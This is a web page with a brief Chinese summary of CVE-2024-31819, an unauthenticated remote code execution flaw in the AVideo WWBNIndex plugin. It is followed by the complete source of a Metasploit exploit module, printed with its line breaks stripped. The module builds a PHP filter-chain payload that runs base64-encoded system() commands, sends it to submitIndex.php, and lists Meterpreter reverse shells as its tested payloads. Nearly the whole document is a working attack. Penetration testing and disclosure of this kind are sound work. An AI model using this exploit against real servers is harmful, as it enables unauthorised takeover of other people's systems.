该模块揭示AVideo平台的WWBNIndex插件存在未授权远程代码执行漏洞，攻击者可利用此漏洞在服务器上执行任意PHP代码，控制受影响系统，此漏洞无需认证，危害较大。

🧐AVideo平台的WWBNIndex插件中的`submitIndex.php`文件存在漏洞，用户输入未经适当净化直接传递给`require()`函数，这使得攻击者可利用PHP过滤链技术执行任意PHP代码。

😱此漏洞无需认证，任何远程攻击者均可利用，能让攻击者在服务器上执行命令并控制受影响的系统，危险性极高。

📋该漏洞影响多种平台，包括php、unix、linux、win等，针对不同平台有相应的测试方法和利用方式。

🔍提供了漏洞检测的方法，通过发送请求检查AVideo版本及WWBNIndex插件是否存在漏洞，以确定系统是否易受攻击。

This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::RemoteRank = ExcellentRankinginclude Msf::Exploit::Remote::HttpClientinclude Msf::Exploit::Remote::HTTP::PhpFilterChainprepend Msf::Exploit::Remote::AutoCheckdef initialize(info = {})super(update_info(info,'Name' => 'AVideo WWBNIndex Plugin Unauthenticated RCE','Description' => %q{This module exploits an unauthenticated remote code execution (RCE) vulnerabilityin the WWBNIndex plugin of the AVideo platform. The vulnerability exists within thesubmitIndex.php file, where user-supplied input is passed directly to the require()function without proper sanitization. By exploiting this, an attacker can leverage thePHP filter chaining technique to execute arbitrary PHP code on the server. This allowsfor the execution of commands and control over the affected system. The exploit isparticularly dangerous because it does not require authentication, making it possiblefor any remote attacker to exploit this vulnerability.},'Author' => ['Valentin Lobstein'],'License' => MSF_LICENSE,'References' => [['CVE', '2024-31819'],['URL', 'https://github.com/WWBN/AVideo'],['URL', 'https://chocapikk.com/posts/2024/cve-2024-31819']],'Platform' => ['php', 'unix', 'linux', 'win'],'Arch' => [ARCH_PHP, ARCH_CMD],'Targets' => [['PHP In-Memory',{'Platform' => 'php','Arch' => ARCH_PHP# tested with php/meterpreter/reverse_tcp}],['Unix In-Memory',{'Platform' => ['unix', 'linux'],'Arch' => ARCH_CMD# tested with cmd/linux/http/x64/meterpreter/reverse_tcp}],['Windows In-Memory',{'Platform' => 'win','Arch' => ARCH_CMD# tested with cmd/windows/http/x64/meterpreter/reverse_tcp}],],'Privileged' => false,'DisclosureDate' => '2024-04-09','Notes' => {'Stability' => [CRASH_SAFE],'Reliability' => [REPEATABLE_SESSION],'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]},'DefaultOptions' => {'SSL' => true,'RPORT' => 443,'FETCH_WRITABLE_DIR' => '/tmp'}))enddef exploitphp_code = "<?php #{target['Arch'] == ARCH_PHP ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"} ?>"filter_payload = generate_php_filter_payload(php_code)res = send_request_cgi('method' => 'POST','uri' => normalize_uri(target_uri.path, 'plugin', 'WWBNIndex', 'submitIndex.php'),'ctype' => 'application/x-www-form-urlencoded','data' => "systemRootPath=#{filter_payload}")print_error("Server returned #{res.code}. Successful exploit attempts should not return a response.") if res&.codeenddef checkres = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'index.php'),'method' => 'GET','follow_redirect' => true})return CheckCode::Unknown('Failed to connect to the target.') unless resreturn CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200version_match = res.body.match(/Powered by AVideo ® Platform v([\d.]+)/) || res.body.match(/<!--.?v:([\d.]+).?-->/m)return CheckCode::Unknown('Unable to extract AVideo version.') unless version_match && version_match[1]version = Rex::Version.new(version_match[1])plugin_check = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'plugin', 'WWBNIndex', 'submitIndex.php'),'method' => 'GET'})unless plugin_check&.code == 200CheckCode::Safe('Vulnerable plugin WWBNIndex was not detected')endif version.between?(Rex::Version.new('12.4'), Rex::Version.new('14.2'))return CheckCode::Appears("Detected vulnerable AVideo version: #{version}, with vulnerable plugin WWBNIndex running.")endCheckCode::Safe("Detected non-vulnerable AVideo version: #{version}")endend